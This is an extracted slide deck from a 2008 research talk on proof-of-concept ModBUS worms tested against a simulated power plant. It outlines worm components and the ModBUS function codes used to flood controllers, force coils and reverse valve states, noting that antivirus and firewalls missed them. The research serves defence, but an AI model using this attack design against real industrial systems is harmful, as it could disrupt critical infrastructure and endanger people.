Scada Malware,A Proof of Concept

A. Carcano, I. Nai Fovino, M. Masera, A. TrombettaEuropean Commission Joint Research Centre

Critis 2008, Rome, October 15, 2008

Outline

• Motivations

• Testing Environment

• Experimental Program

• Results

• Conclusion

CI Dependence on IT Systems

• Today most of critical infrastructures depend highly on the underlying communication networks.

Central Monitoring Unit

CommunicationsNetwork

Sensor

Remote Terminal Unit 1

Remote Terminal Unit 2

Sensor

Programmable Logic Controller

Sensor

Fiber, Radio, Modem,Microwave, Telephone, Wireless, Powerline Carrier

Adapted from: Joint Program Office for Special Technology Countermeasures Naval Surface Warfare Center, Dahlgren Division

-Remote Control-Remote maintenance-New features

-New Vulnerabilities-New Attack Scenarios-New Threats

Computer Attacks

Most of attacks are Malware basedMost of attacks are Malware basedVirusVirus

WormWorm

TrojanTrojan

diagnostics diagnosticsvibrations

common services

gateway

Process networkcontrol

field bus

actuators / transductorsControl system

Combustionchamber

air

gas

fumesTurbogasTurbine GCompressor Steam

generator

fumeswater

steam

GTurbine

comandsalarms - blocks

supervisionmonitoringdiagnostics

Fieldcontrol

Turbo Gascontrol

Office network

routerWorkstation

Intranet

firewallfirewall

DMZData Network

data server

router

ExternalNetwork

comandscontrol datasupervisionmonitoringdiagnostics

Plantcontrol

Known EffectsUnknown Effects

Need of concrete studieson the effects of Malwareson Critical Infrastrucutres

Problems

• How to simulate malwares on Critical Infrastructures?

• How and where to study their effects?

Malware Simulation: MAlSim Toolkit

• MAlSim Toolkit:• Various families of malware (worms,

viruses, malicious mobile code etc.)• Various species of malware of the

same family (e.g. macro viruses, metamorphic and polymorphic viruses etc.)

• Well-known malware (e.g. Code Red, Nimda, SQL Slammer)

• Non-existent configurations

Power Plant Simulator

Power Plant EnvironmentPower Plant Environment Field NetworkField Network

Process NetworkProcess Network

Data NetworkData Network

DMZ NetworkDMZ Network

Intranet NetworkIntranet Network

Attack SourceAttack Source InsideInside

OutsideOutside

System MeasurementsSystem MeasurementsAnalysis SystemsAnalysis Systems Vulnerabilities RepositoryVulnerabilities Repository

Binaries RepositoryBinaries Repository

InSAWInSAW

Experiments ArchiveExperiments Archive

Ad-Hoc SCADA Malwares

ConsiderationsAbout “SCADA”

Protocols

Such protocols, are normallyused by some dedicated servers in order to send

commands to the field devices

ModBUS

DNP3

ProfiBUS

…Others…- Application layer messaging protocol

- Provides Client/Server communication service

- TCP/IP Implementation - Widely Used

Lack of:

-Integrity controls-Authentication Mechanisms-Non Repudiation Mechanisms- Anti-replay Mechanisms

It is possible to create a set of MalwaresWhich take advantage of such basic vulnerabilities

Attack Scenarios (1)

ModBUS Malware DOS- Attack Scope

- To desynchronize the communication between Master and Slave - To completely avoid the communication stream between Master and

Slaves- Code Implementation

- A Packet builder, which forges in the proper manner ModBUS over TCP packets.

- A Discovery engine, which explores the network in order to identify the IP addresses of the Modbus slaves.

- A Packet deliverer, which sends in an optimized way the previously forged packets to the target slaves, in order to saturate the bandwidth as soon as possible.

- Infection Trigger:

Attack Scenarios (1)

FW-VPN

Master/Secondary

ModBus DOS Worm

Slammer

Slammer Infection Engine

Modbus Packet Generator

Discovery Engine

Malsim Framework

-Slammer-Nimda-Poskiwing(6 october)- …

Test Results

1. Anti-viruses do not recognize the ad-hoc crafted malware

2. Firewalls do not stop the traffic generated by the malware since it has the shape of “legal ModBUStraffic”

Attack Scenarios (2)

ModBUS COM Worm- Attack Scope

– The scope of the Com Worm attack is to take the control of the slaves of the process control architecture by taking advantage of the lack of authentication and integrity countermeasures of the ModBUS protocol.

- Code Implementation- A Packet builder- A Discovery engine- A Strategy & analysis module, which, on the basis of the information

gathered by the discovery engine and some built-in heuristics identifies the strategy to adopt in order to send packets which could create damages to the system.

- A Packet deliverer, which send the forged packets to the target slaves

Experimental tests

• Worm prototypes:- Step 1 Malware: it replicates the MODBUS function 15 (0x0F), used to

force each coil in a sequence of coils to either be ON or OFF in a remote device(valve).

- Step 2 Malware: Through the function 16 it is able to write a block of contiguous Input registers (1 to 123) in a remote device.

- Step 3 Malware: by combining the two ModBUS functions (0x01) (read output values) and (0x0F) used to force a sequence of coils, it revert completely the configuration of the target system (e.g. if a valve is opened it will be closed and viceversa.

Experimental Considerations

• Antiviruses do not identify the new worms

• Firewall completely ignores the attacks since the traffic appears completely legal

• The slaves execute in all the cases all the worm command, without identifying any anomaly.

Conclusion

• Industrial SCADA protocols are far to be considered secure• In this paper we proved that the scenario in which a worm could

take the control of a portion of an industrial plant is nowadays a reality.

• Traditional Antiviruses and FW are inadequate for several reasons:– SCADA systems are very specialized systems, using dedicated

protocols (sometimes proprietary).– Anomaly detection techniques cannot be easily deployed into

industrial systems.– Patches could interfere with some particular ad-hoc sw.

• Future works:- SCADA Intrusion Detection System- Secure SCADA protocols

Old Operating Systems:

• Win NT 3.0 /4.0• Win 2000• BSD• SCO

…Considerations (1)

Rare Patching

Policies

Low “ICT Security Perception”

Considerationsabout Process Sub-Systems

Process Sub-Systems

are typically prone to

traditional malwares

Consequences of pervasive ICT

- Software Vulnerabilities- Architectural Vulnerabilities- ICT Security Policy Vulnerabilities

Consequences- New Attack Scenarios- New Risks- Old Safety studies no more

“actual”

- Need for new Models- Need for new Risk

assessment methods- Need for new experimental - studies

- Infection Triggers:

Attack Scenarios (1)

E-mail

FW-VPN

Master/Secondary

Social Engineering

E-Mail Forge

Malware Camouflage

Phishing

DNS

Fake Site Creation

DNS Poisoning

Operator PC Infection

ModBus DOS Worm

Slammer

Slammer Infection Engine

Modbus Packet Generator

Discovery Engine

Malsim Framework

-Slammer-Nimda-Poskiwing(6 october)- …